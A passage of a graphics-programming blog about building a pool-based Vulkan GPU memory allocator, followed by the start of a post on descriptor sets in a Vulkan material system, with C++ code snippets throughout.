<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">MemoryPool</span><span class="o">></span> <span class="n">memPools</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>So yeah… that’s a lot of nested vectors, but it works and that’s good enough for me right now. I’m sure someone reading this has strong opinions about a better way to structure this and I’d actually really love to hear about it <a href="https://twitter.com/khalladay">on Twitter</a>, but for this article, I’m going with the above.</p>
<p>The first two structs at the beginning are really just more convenient std::pairs. I hate pairs because .first and .second get really hard to read really fast, and these just give me more useful member names.</p>
<p>The AllocatorState structure is the real meat of the above snippet. For the most part it’s probably pretty self-explanatory, but the few variables that aren’t probably make more sense in the context of the activate function, which is less boring than the one in the passthrough allocator:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">activate</span><span class="p">(</span><span class="n">VkhContext</span><span class="o">*</span> <span class="n">context</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">context</span><span class="o">-></span><span class="n">allocator</span> <span class="o">=</span> <span class="n">allocImpl</span><span class="p">;</span>
<span class="n">state</span><span class="p">.</span><span class="n">context</span> <span class="o">=</span> <span class="n">context</span><span class="p">;</span>
<span class="n">VkPhysicalDeviceMemoryProperties</span> <span class="n">memProperties</span><span class="p">;</span>
<span class="n">vkGetPhysicalDeviceMemoryProperties</span><span class="p">(</span><span class="n">context</span><span class="o">-></span><span class="n">gpu</span><span class="p">.</span><span class="n">device</span><span class="p">,</span> <span class="o">&</span><span class="n">memProperties</span><span class="p">);</span>
<span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">.</span><span class="n">resize</span><span class="p">(</span><span class="n">memProperties</span><span class="p">.</span><span class="n">memoryTypeCount</span><span class="p">);</span>
<span class="n">state</span><span class="p">.</span><span class="n">memPools</span><span class="p">.</span><span class="n">resize</span><span class="p">(</span><span class="n">memProperties</span><span class="p">.</span><span class="n">memoryTypeCount</span><span class="p">);</span>
<span class="n">state</span><span class="p">.</span><span class="n">pageSize</span> <span class="o">=</span> <span class="n">context</span><span class="o">-></span><span class="n">gpu</span><span class="p">.</span><span class="n">deviceProps</span><span class="p">.</span><span class="n">limits</span><span class="p">.</span><span class="n">bufferImageGranularity</span><span class="p">;</span>
<span class="n">state</span><span class="p">.</span><span class="n">memoryBlockMinSize</span> <span class="o">=</span> <span class="n">state</span><span class="p">.</span><span class="n">pageSize</span> <span class="o">*</span> <span class="mi">10</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>I chose the minimum block size at random, and in practice that number is probably the most important one for making sure this allocator performs the best it can (ideally large enough that every large allocation will be able to be broken up by multiple requests). My app is so simple that I’m not worrying about using up all my graphics memory, so I probably could have made this 10x larger than it is, but that seemed like an even dumber idea than what I did.</p>
<p>The rest of that function pretty much documents itself, but without it, the allocate function would have made a lot less sense:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">alloc</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">outAlloc</span><span class="p">,</span> <span class="n">VkDeviceSize</span> <span class="n">size</span><span class="p">,</span> <span class="kt">uint32_t</span> <span class="n">memoryType</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MemoryPool</span><span class="o">&</span> <span class="n">pool</span> <span class="o">=</span> <span class="n">state</span><span class="p">.</span><span class="n">memPools</span><span class="p">[</span><span class="n">memoryType</span><span class="p">];</span>
<span class="c1">//make sure we always alloc a multiple of pageSize</span>
<span class="n">VkDeviceSize</span> <span class="n">requestedAllocSize</span> <span class="o">=</span> <span class="p">((</span><span class="n">size</span> <span class="o">/</span> <span class="n">state</span><span class="p">.</span><span class="n">pageSize</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="n">state</span><span class="p">.</span><span class="n">pageSize</span><span class="p">;</span>
<span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">memoryType</span><span class="p">]</span> <span class="o">+=</span> <span class="n">requestedAllocSize</span><span class="p">;</span>
<span class="n">BlockSpanIndexPair</span> <span class="n">location</span><span class="p">;</span>
<span class="n">bool</span> <span class="n">found</span> <span class="o">=</span> <span class="n">findFreeChunkForAllocation</span><span class="p">(</span><span class="n">location</span><span class="p">,</span> <span class="n">memoryType</span><span class="p">,</span> <span class="n">requestedAllocSize</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">found</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">location</span> <span class="o">=</span> <span class="p">{</span> <span class="n">addBlockToPool</span><span class="p">(</span><span class="n">requestedAllocSize</span><span class="p">,</span> <span class="n">memoryType</span><span class="p">),</span> <span class="mi">0</span> <span class="p">};</span>
<span class="p">}</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">handle</span> <span class="o">=</span> <span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">location</span><span class="p">.</span><span class="n">blockIdx</span><span class="p">].</span><span class="n">mem</span><span class="p">.</span><span class="n">handle</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">offset</span> <span class="o">=</span> <span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">location</span><span class="p">.</span><span class="n">blockIdx</span><span class="p">].</span><span class="n">layout</span><span class="p">[</span><span class="n">location</span><span class="p">.</span><span class="n">spanIdx</span><span class="p">].</span><span class="n">offset</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">type</span> <span class="o">=</span> <span class="n">memoryType</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">location</span><span class="p">.</span><span class="n">blockIdx</span><span class="p">;</span>
<span class="n">markChunkOfMemoryBlockUsed</span><span class="p">(</span><span class="n">memoryType</span><span class="p">,</span> <span class="n">location</span><span class="p">,</span> <span class="n">requestedAllocSize</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>The most important thing to note in this function is that no matter how big the allocation we need is, the allocator rounds it up to the nearest multiple of our page size and uses that. The only thing that needs the originally asked for allocation size is the structure we’re returning to the caller (since it needs the correct size for the bind function).</p>
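<p>One detail of the rounding expression is worth spelling out: because it always adds one page after the integer division, a request that is already an exact multiple of the page size still gets bumped up by a full page. Here is a small sketch comparing it with a common alternative. The function names are mine, not something from the repo:</p>

```cpp
#include <cassert>
#include <cstdint>

// The expression used in the post: always moves to the next page boundary,
// so a size that is already a whole number of pages gains one extra page.
uint64_t roundUpAsInPost(uint64_t size, uint64_t pageSize)
{
    assert(pageSize != 0);
    return ((size / pageSize) + 1) * pageSize;
}

// A common alternative: rounds up to the next multiple of pageSize, but
// leaves sizes that are already exact multiples untouched.
uint64_t roundUpToMultiple(uint64_t size, uint64_t pageSize)
{
    assert(pageSize != 0);
    return ((size + pageSize - 1) / pageSize) * pageSize;
}
```

<p>With a 1024 byte page, a 1000 byte request becomes 1024 bytes either way, but a 1024 byte request becomes 2048 bytes with the first version and stays at 1024 with the second. If you swap one for the other, the free function has to use the same expression, since it recomputes the rounded size from the original request.</p>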
<p>This function itself is pretty straightforward, as are the couple of functions I haven’t pasted here. findFreeChunkForAllocation returns a location inside our target MemoryPool that can fit the allocation we want to make. If it can’t find space, we have to make space by adding a new block to the pool, which is what addBlockToPool does (it returns the new block’s index in the memory pool).</p>
<p>Finally, after we build our allocation structure, we have to update the usage data for the DeviceMemoryBlock we’re using to make sure we know what regions of memory are already in use.</p>
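<p>To make that last step a bit more concrete, here is a minimal sketch of what marking a chunk as used could look like. It assumes (based on how the free function treats the layout vector) that each entry in a block’s layout describes a free region. The takeFromFrontOfSpan helper is hypothetical, and the real markChunkOfMemoryBlockUsed in the repo may well differ:</p>

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Same shape as the OffsetSize struct in the post; each entry is assumed to
// describe a FREE region of a block.
struct OffsetSize { uint64_t offset; uint64_t size; };

// Hypothetical helper: hand out `size` bytes from the front of a free span by
// moving the span's start forward and shrinking it. Returns the offset that
// the caller should bind the resource at.
uint64_t takeFromFrontOfSpan(std::vector<OffsetSize>& freeSpans, uint32_t spanIdx, uint64_t size)
{
    assert(spanIdx < freeSpans.size());
    OffsetSize& span = freeSpans[spanIdx];
    assert(size <= span.size);

    const uint64_t allocationOffset = span.offset;
    span.offset += size;
    span.size -= size;
    return allocationOffset;
}
```

<p>A span that shrinks to zero bytes is left in the list here. That is harmless for a first-fit search, but a tidier version would probably erase it.</p>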
<p>The code for all of these functions is on <a href="https://github.com/khalladay/VkMaterialSystem/blob/material-instances/VkMaterialSystem/vkh_allocator_pool.cpp">the github repo</a> (I’ve linked directly to the allocator’s .cpp file), so click through if you’re interested. I’m going to omit them here for brevity.</p>
<p>One function I’m not going to omit is the free function:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">free</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">allocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">VkDeviceSize</span> <span class="n">requestedAllocSize</span> <span class="o">=</span> <span class="p">((</span><span class="n">allocation</span><span class="p">.</span><span class="n">size</span> <span class="o">/</span> <span class="n">state</span><span class="p">.</span><span class="n">pageSize</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="n">state</span><span class="p">.</span><span class="n">pageSize</span><span class="p">;</span>
<span class="n">OffsetSize</span> <span class="n">span</span> <span class="o">=</span> <span class="p">{</span><span class="n">allocation</span><span class="p">.</span><span class="n">offset</span><span class="p">,</span> <span class="n">requestedAllocSize</span> <span class="p">};</span>
<span class="n">MemoryPool</span><span class="o">&</span> <span class="n">pool</span> <span class="o">=</span> <span class="n">state</span><span class="p">.</span><span class="n">memPools</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">type</span><span class="p">];</span>
<span class="n">bool</span> <span class="n">found</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">layout</span><span class="p">.</span><span class="n">size</span><span class="p">();</span> <span class="o">++</span><span class="n">j</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">layout</span><span class="p">[</span><span class="n">j</span><span class="p">].</span><span class="n">offset</span> <span class="o">==</span> <span class="n">requestedAllocSize</span> <span class="o">+</span><span class="n">allocation</span><span class="p">.</span><span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">layout</span><span class="p">[</span><span class="n">j</span><span class="p">].</span><span class="n">offset</span> <span class="o">=</span> <span class="n">allocation</span><span class="p">.</span><span class="n">offset</span><span class="p">;</span>
<span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">layout</span><span class="p">[</span><span class="n">j</span><span class="p">].</span><span class="n">size</span> <span class="o">+=</span> <span class="n">requestedAllocSize</span><span class="p">;</span>
<span class="n">found</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">found</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">state</span><span class="p">.</span><span class="n">memPools</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">type</span><span class="p">].</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">layout</span><span class="p">.</span><span class="n">push_back</span><span class="p">(</span><span class="n">span</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//the freed pages stop counting as allocated whether or not they were merged into a neighbouring span</span>
<span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">type</span><span class="p">]</span> <span class="o">-=</span> <span class="n">requestedAllocSize</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Remember that the Allocation struct needed to have the original, non-rounded-up size so it could bind properly, so the first thing we need to do is recompute the size of the memory chunk it takes up in one of our pools. After that, it’s just a matter of updating the usage data for the block the allocation came from (whose index I store in the id variable of the struct). The logic I’m using to update the layout for the blocks is really simple, and is almost certainly suboptimal in a lot of scenarios, but it works for now and is short enough to paste into a blog post, so I’m going to go with it.</p>
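<p>To give an idea of what a less naive version might look like: the free function above only merges a freed region with a free span that starts right after it, so a freed region that sits directly after a free span ends up as a separate entry. Here is a sketch, under the assumption that the free list is kept sorted by offset, that merges in both directions. The releaseSpan name is made up, and this is not what the repo does:</p>

```cpp
#include <algorithm>
#include <cstdint>
#include <vector>

// Same shape as the OffsetSize struct in the post.
struct OffsetSize { uint64_t offset; uint64_t size; };

// Return a region to a free list that is kept sorted by offset, merging it
// with the free span directly after and/or directly before it when they touch.
void releaseSpan(std::vector<OffsetSize>& freeSpans, OffsetSize freed)
{
    // First free span whose offset is not less than the freed region's offset.
    auto next = std::lower_bound(freeSpans.begin(), freeSpans.end(), freed,
        [](const OffsetSize& a, const OffsetSize& b) { return a.offset < b.offset; });

    // Merge with the following span if the freed region ends where it begins.
    if (next != freeSpans.end() && freed.offset + freed.size == next->offset)
    {
        freed.size += next->size;
        next = freeSpans.erase(next);
    }

    // Merge with the preceding span if it ends where the freed region begins.
    if (next != freeSpans.begin())
    {
        auto prev = next - 1;
        if (prev->offset + prev->size == freed.offset)
        {
            prev->size += freed.size;
            return;
        }
    }

    // No neighbour to merge into on the left: insert in sorted position.
    freeSpans.insert(next, freed);
}
```

<p>Keeping the list sorted costs an insert in the middle of a vector now and then, but it means adjacent free regions always collapse back into one span, so a block that has had everything freed ends up described by a single entry again.</p>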
<p>Also important to note: I’m not actually ever freeing memory right now, just reusing pages. In a big kid app, I’d probably need to change that.</p>
<p>The remaining parts of the AllocatorInterface that the pool allocator implements are as follows:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">size_t</span> <span class="nf">allocatedSize</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">memoryType</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">memoryType</span><span class="p">];</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">numAllocs</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">state</span><span class="p">.</span><span class="n">totalAllocs</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>I’m going to go out on a limb and assume these don’t need explanation.</p>
<p>Putting all of this together and re-running the MaterialDemo app shows that now I’m only using 4 active allocations to render the frame! That’s a big improvement over the 11 that I needed earlier. Mission success! Mostly…</p>
<h2 id="the-problem-of-mapping-memory">The Problem Of Mapping Memory</h2>
<p>Unfortunately, using the above code, I ended up with the following in my output log:</p>
<blockquote>
<p>VkMapMemory: Attempting to map memory on an already-mapped object 0x1a</p>
</blockquote>
<p>It appears to be incorrect to map the same VkDeviceMemory block more than once at the same time, even if you’re mapping different regions of the block of memory. This means that the pool allocator needs a bit more information about how we plan to use the memory that we get out of it, to decide whether it needs to put that allocation into its own chunk of memory, or if it can reuse an old one like I did above.</p>
<p>Any allocation that isn’t device local <em>might</em> be mapped at some point, so I decided to simply assume that if an allocation’s memory properties weren’t exactly VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT, I would give it its own allocation. Since the usage flags aren’t part of a standard VkMemoryAllocateInfo, this meant I had to define my own AllocationCreateInfo struct, and modify my AllocatorInterface a bit:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">AllocationCreateInfo</span>
<span class="p">{</span>
<span class="n">VkMemoryPropertyFlags</span> <span class="n">usage</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">memoryTypeIndex</span><span class="p">;</span>
<span class="n">VkDeviceSize</span> <span class="n">size</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">AllocatorInterface</span>
<span class="p">{</span>
<span class="c1">//this was the only function that changed</span>
<span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">alloc</span><span class="p">)(</span><span class="n">Allocation</span><span class="o">&</span><span class="p">,</span> <span class="n">AllocationCreateInfo</span><span class="p">);</span>
<span class="p">};</span></code></pre></figure>
<p>This is probably better long term anyway, because at some point it will likely be handy to be able to pass even more data about how the allocation will be used to the alloc function, and now I have the place to do that.</p>
<p>The changes to the allocator itself are very minimal. First, I added a flag to the DeviceMemoryBlock struct to flag it as “reserved,” that is, not eligible for new allocations even if there is room:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">DeviceMemoryBlock</span>
<span class="p">{</span>
<span class="n">Allocation</span> <span class="n">mem</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">OffsetSize</span><span class="o">></span> <span class="n">layout</span><span class="p">;</span>
<span class="n">bool</span> <span class="n">pageReserved</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>Next, the allocation function needed to be modified to check if an allocation needed a whole page to itself, and to pass that info to the findFreeChunkForAllocation function. This flag forces the find function to return a totally unused DeviceMemoryBlock that will fit the allocation.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">alloc</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">outAlloc</span><span class="p">,</span> <span class="n">AllocationCreateInfo</span> <span class="n">createInfo</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//rest of code omitted for brevity</span>
<span class="n">bool</span> <span class="n">needsOwnPage</span> <span class="o">=</span> <span class="n">createInfo</span><span class="p">.</span><span class="n">usage</span> <span class="o">!=</span> <span class="n">VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT</span><span class="p">;</span>
<span class="n">bool</span> <span class="n">found</span> <span class="o">=</span> <span class="n">findFreeChunkForAllocation</span><span class="p">(</span><span class="n">location</span><span class="p">,</span> <span class="n">memoryType</span><span class="p">,</span> <span class="n">requestedAllocSize</span><span class="p">,</span> <span class="n">needsOwnPage</span><span class="p">);</span>
<span class="c1">//...</span>
<span class="p">}</span></code></pre></figure>
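<p>The exact-equality check is deliberately conservative. Since only memory with the host visible property can be mapped at all, one possible variation is to test that bit instead. The sketch below compares the two; the constants are stand-ins with the same values as the corresponding VkMemoryPropertyFlagBits entries so that the snippet compiles without the Vulkan headers, and the function names are mine:</p>

```cpp
#include <cstdint>

// Stand-ins so this compiles without the Vulkan headers. The values match the
// corresponding VkMemoryPropertyFlagBits entries.
using MemoryPropertyFlags = uint32_t;
constexpr MemoryPropertyFlags kDeviceLocalBit  = 0x1; // VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT
constexpr MemoryPropertyFlags kHostVisibleBit  = 0x2; // VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT
constexpr MemoryPropertyFlags kHostCoherentBit = 0x4; // VK_MEMORY_PROPERTY_HOST_COHERENT_BIT

// The check used in the post: anything that is not exactly DEVICE_LOCAL gets
// a block to itself.
bool needsOwnPageExact(MemoryPropertyFlags usage)
{
    return usage != kDeviceLocalBit;
}

// A variation (an assumption on my part, not the post's code): only memory
// that can actually be mapped, i.e. HOST_VISIBLE memory, gets a block to itself.
bool needsOwnPageIfMappable(MemoryPropertyFlags usage)
{
    return (usage & kHostVisibleBit) != 0;
}
```

<p>Both versions agree for the common cases (plain device local memory can share a block, host visible memory can’t). They only differ for flag combinations that include extra bits without being host visible.</p>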
<p>Then, after either finding or creating a memory block to use, the allocation function marks that DeviceMemoryBlock as reserved if the allocation needs its own page:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">location</span><span class="p">.</span><span class="n">blockIdx</span><span class="p">].</span><span class="n">pageReserved</span> <span class="o">=</span> <span class="n">needsOwnPage</span><span class="p">;</span></code></pre></figure>
<p>Finally, the free function had to be modified to mark any DeviceMemoryBlock that it’s freeing memory from as not reserved:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">free</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">allocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//rest of code omitted for brevity</span>
<span class="n">MemoryPool</span><span class="o">&</span> <span class="n">pool</span> <span class="o">=</span> <span class="n">state</span><span class="p">.</span><span class="n">memPools</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">type</span><span class="p">];</span>
<span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">pageReserved</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="c1">//...</span>
<span class="p">}</span></code></pre></figure>
<p>With all that in place, I ran the MaterialDemo again, and at long last, got the thing to run with no errors, and only 4 allocations, which means I’m calling work on this done for now.</p>
<h2 id="wrap-up">Wrap Up</h2>
<p>I’m really glad that I decided to dig into this rather than just grab GPUOpen’s allocator. I learned a ton about Vulkan memory that I’m quite positive I never would have learned otherwise. As mentioned many times, all the code for this is available <a href="https://github.com/khalladay/VkMaterialSystem/tree/material-instances">on github</a>.</p>
<p>As per usual, I’m sure I’m doing a hundred different dumb things in this article, and I’d love you to send me a message <a href="https://twitter.com/khalladay">on Twitter</a>, or @Khalladay on <a href="gamedev.mastodon.place">Mastodon</a> if you spot one of them (or want to say hi).</p>
<p>Tune in next time when I try to finally add instances to the material system!</p>
Lessons Learned While Building a Vulkan Material System2017-11-27T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2017/11/27/Vulkan-Material-System<p>One of the things I’m noticing about learning Vulkan is that there isn’t a lot of material out there to bridge the gap between being a complete beginner and being able to build your own real applications.</p>
<p>I didn’t realize how big this gap was until I decided to start my next Vulkan project by building a material system. It was supposed to just be the first step in something bigger, but I realized pretty quickly that I didn’t know nearly enough to even get this small piece done. So I scrapped my loftier plans, and decided to split building the material system up into two parts. The first phase (which is the part I have done) was to simply load materials from a file which specified which shaders to use, and which default values to use for their inputs. To keep things simple, I’ve so far always been loading the material onto a full screen quad.</p>
<p>The second phase will be to extend the system to handle material instances, and thousands of objects, but before I dive into that, it felt like a good time to take a step back and write down some of the things I’ve had to figure out to get this far, in case someone else gets stuck in the same places.</p>
<div align="center">
<img src="/images/post_images/2017-11-28/output.png" />
<font size="2">One of my tests was Inigo Quilez's <a href="https://www.shadertoy.com/view/Xds3zN">raymarching primitives shader</a></font>
<br /><br />
</div>
<p>This post is going to jump around a little bit, as you’ll notice by the headings. Some things I want to share are just things I didn’t realize about how to use the Vulkan API, some are “good ideas” that are working out for me so far, and finally I want to write a bit about the high level structure of how my material system works.</p>
<p>All the code for everything is <a href="https://github.com/khalladay/VkMaterialSystem">on github</a>, and I’ve tried to add helpful comments to <a href="https://github.com/khalladay/VkMaterialSystem/blob/master/VkMaterialSystem/material_creation.cpp">material_creation.cpp</a>, which contains most of the stuff I’m talking about here. Standard caveats to everything: I barely know what I’m doing, there’s probably better ways to do this, I’m not a lawyer, yadda yadda yadda.</p>
<h2 id="how-descriptor-sets-and-bindings-work">How Descriptor Sets (and Bindings!) Work</h2>
<p>The first thing that I really needed to get a handle on was how descriptor sets work in Vulkan GLSL. It’s easy enough to look at the syntax and realize that they’re a method for grouping shader inputs and move on, but there’s a bit more to them than that.</p>
<p>For one, Vulkan shaders aren’t namespaced, so Descriptor Set 0 in your vertex shader, is Descriptor Set 0 in your fragment shader (or any other stage you’re using in your material). This also means that a single descriptor set can have bindings that exist in different shader stages, but still all belong to the same set. Even more fun, since the SPIR-V compiler will (likely) remove any variables not in use by your shader, your shader stages may all have the same Descriptor Set Binding in them, and see different versions of that binding.</p>
<p>Let me show you what I mean. If you have a vertex shader that uses descriptor set 0, binding 0, to hold some global information:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">layout</span><span class="p">(</span><span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span><span class="n">uniform</span> <span class="n">GLOBAL_DATA</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">time</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">mouse</span><span class="p">;</span>
<span class="p">}</span><span class="n">global</span><span class="p">;</span></code></pre></figure>
<p>But your actual shader code only ever uses the time member of the GLOBAL_DATA uniform, the compiler will optimize away the mouse member var entirely. However, your fragment shader might also need access to global data, and if it uses the mouse data, and not the time data, it won’t even know that set 0, binding 0 has the time member in it.</p>
<p>To keep everyone on the same page despite this, data about the size of the overall uniform is still there (that is, the size of the struct with ALL members, including compiled out ones, present), along with information about the offset into the struct that a member sits at. So your fragment shader, which only knows about mouse data, will still know that the GLOBAL_DATA uniform is 32 bytes large, and the mouse data is offset 16 bytes from the start of the uniform buffer. With this information, it doesn’t matter which member vars each stage sees.</p>
<p>Note that with the std140 layout used for uniform blocks, vec3 and vec4 members are 16 byte aligned in Vulkan, more on that later.</p>
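<p>To make the offset arithmetic concrete, here’s a minimal sketch that walks a block containing a float followed by a vec4 and assigns offsets using std140-style base alignments (4 bytes for a float, 16 for a vec4). The Member struct and the layoutBlock and makeGlobalData helpers are made up for this example; they aren’t part of my project or of any Vulkan API, and the sketch ignores arrays, matrices and nested structs.</p>

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical description of one uniform block member (not a Vulkan type).
struct Member
{
    const char* name;
    uint32_t size;      // bytes the member occupies
    uint32_t alignment; // std140 base alignment in bytes (power of two)
    uint32_t offset;    // filled in by layoutBlock
};

// Round value up to the next multiple of a power-of-two alignment.
inline uint32_t alignUp(uint32_t value, uint32_t alignment)
{
    assert(alignment != 0 && (alignment & (alignment - 1)) == 0);
    return (value + alignment - 1) & ~(alignment - 1);
}

// Assigns an offset to each member in declaration order and returns the
// offset just past the last member. Assumes a flat block: no arrays,
// matrices or nested structs.
inline uint32_t layoutBlock(std::vector<Member>& members)
{
    uint32_t cursor = 0;
    for (Member& m : members)
    {
        m.offset = alignUp(cursor, m.alignment);
        cursor = m.offset + m.size;
    }
    return cursor;
}

// A float followed by a vec4.
inline std::vector<Member> makeGlobalData()
{
    return {
        { "time",  4,  4,  0 }, // float: 4 bytes, 4 byte alignment
        { "mouse", 16, 16, 0 }, // vec4: 16 bytes, 16 byte alignment
    };
}
```

<p>Running layoutBlock over the result of makeGlobalData puts time at offset 0 and mouse at offset 16, and returns 32, which is the same 16 and 32 that show up in the reflection data for GLOBAL_DATA later in this post.</p>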
<h2 id="use-descriptor-sets-to-group-inputs-by-update-frequency">Use Descriptor Sets To Group Inputs By Update Frequency</h2>
<p>You can’t bind an individual set binding in a command buffer, you have to bind an entire descriptor set at once, and binding a descriptor set is a performance heavy operation. What you should do (at least according to <a href="https://developer.nvidia.com/vulkan-shader-resource-binding">NVidia’s Article</a>), is use your descriptor sets to group shader inputs by how frequently they need to be swapped out. Once a descriptor set is bound, it stays bound for the duration of that command buffer, until something else gets bound to that set index. So if everything uses the same set 0, you can bind it once and never pay the cost to bind that again (until next frame).</p>
<p>In my project, I chose set 0 to store Global data which all shaders can access, which will get bound at the beginning of a frame and stay bound while rendering everything, left set 1 alone for a future experiment, and used sets 2 and 3 for data which can change on a per material / per material instance basis. Set 2 is for data which will get set when a material or instance is first loaded and then never changed (like the albedo texture of a character), while set 3 is for shader inputs that can be manipulated at runtime.</p>
<p>An example of how this might play out:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">for</span> <span class="n">each</span> <span class="n">view</span> <span class="p">{</span>
<span class="n">bind</span> <span class="n">global</span> <span class="n">resources</span> <span class="c1">// set 0</span>
<span class="k">for</span> <span class="n">each</span> <span class="n">shader</span> <span class="p">{</span>
<span class="n">bind</span> <span class="n">shader</span> <span class="n">pipeline</span>
<span class="k">for</span> <span class="n">each</span> <span class="n">material</span> <span class="p">{</span>
<span class="n">bind</span> <span class="n">material</span> <span class="n">resources</span> <span class="c1">// sets 2,3</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Obviously this is a pretty simple rendering model, but it’s good enough for this stage of my material system’s life.</p>
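<p>If it helps to see why the grouping matters, here’s a small sketch that walks the same loop nest and just counts how many binds of each kind would get recorded. Nothing here touches Vulkan; ShaderGroup, BindCounts and countBinds are hypothetical names I’m using only for this illustration.</p>

```cpp
#include <cstdint>
#include <vector>

// Hypothetical scene description, for illustration only.
struct ShaderGroup
{
    uint32_t materialCount; // materials that share this shader pipeline
};

struct BindCounts
{
    uint32_t globalSetBinds = 0;   // set 0
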